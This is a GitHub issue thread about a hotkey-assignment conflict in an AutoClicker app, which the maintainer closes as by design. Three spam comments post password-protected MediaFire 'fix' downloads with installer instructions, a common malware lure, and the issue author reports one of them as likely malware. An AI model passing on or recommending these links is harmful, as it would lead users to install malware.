### ISSUE TITLE
Can't assign existing clicking key to another one directly

### ISSUE THREAD

**Issue by svaningelgem** [oriash93/AutoClicker#87] opened 2024-08-29 04:18 UTC
**Describe the bug**
Default is F6-F7-F8. I wanted to change the toggle key to F6, but the clicking takes precedence. So I'd turn off the clicker on that modal window in order to not interfer with the assignment of the hotkeys.

**What I did**

In the hotkeys window, I assigned then ESC 3 times, closed the window (and the app somehow crashed - can't reproduce it tho).
After restarting the app, I assigned F1-F2-F3, saved, and entered F7-F8-F6 to work around the clicker clicking when trying to assign it as a hotkey.

**attached what looks like a log file (at least from the name)**
[AutoClicker.exe.CodeAnalysisLog.zip](https://github.com/user-attachments/files/16791990/AutoClicker.exe.CodeAnalysisLog.zip)

**Comment by marcelo-antonio-nunes** [comment] 2024-08-29 04:21
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by svaningelgem** [comment] 2024-08-29 04:24
⚠Attention⚠ I reported @marcelo-antonio-nunes for likely malware posting.

**Comment by KrissV2** [comment] 2024-08-31 05:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment] 2024-08-31 07:35
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by oriash93** [comment] 2024-09-01 13:22
Hey @svaningelgem thanks for taking the time to open an issue.

I attempted to replicate the behavior you described and understand what you intended to do. However, I believe this is functioning as designed. When the Hotkey Settings window is opened, the F6 key is already assigned to the Start operation. I suggest setting different keys initially (as you mentioned, F1-F2-F3, for example), saving those settings, and then assigning your desired keys and saving again.

Additionally, please note that logs are saved at `%APPDATA%/AutoClicker_Logs.txt`.
If you encounter any other bugs, please open a separate issue and include the log file.

**Closed as completed by oriash93** 2024-09-01 13:22 UTC
Labels: bug/as-designed
